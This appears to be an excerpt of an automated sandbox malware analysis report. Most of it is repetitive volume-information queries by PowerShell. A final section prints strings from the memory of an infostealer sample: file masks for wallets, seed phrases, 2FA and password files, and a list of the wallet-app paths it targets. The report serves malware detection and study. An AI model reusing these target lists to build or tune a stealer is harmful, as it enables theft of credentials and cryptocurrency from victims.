            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeQueries volume information: C:\ VolumeInformation
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00431442 GetUserNameA,15_2_00431442
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043156D HeapAlloc,HeapAlloc,GetTimeZoneInformation,15_2_0043156D
            Source: C:\Users\user\Desktop\Ttok18.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 25aac720-4b65-4596-94df-b9a776dc62c7.exe PID: 8080, type: MEMORYSTR
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: er*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.png,*.pdf,*.py|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3,*.url,*.ini,*.dll|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.png,*.pdf,*.py|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3,*.ini,*.url,*.dll|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: \Electrum\wallets\
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
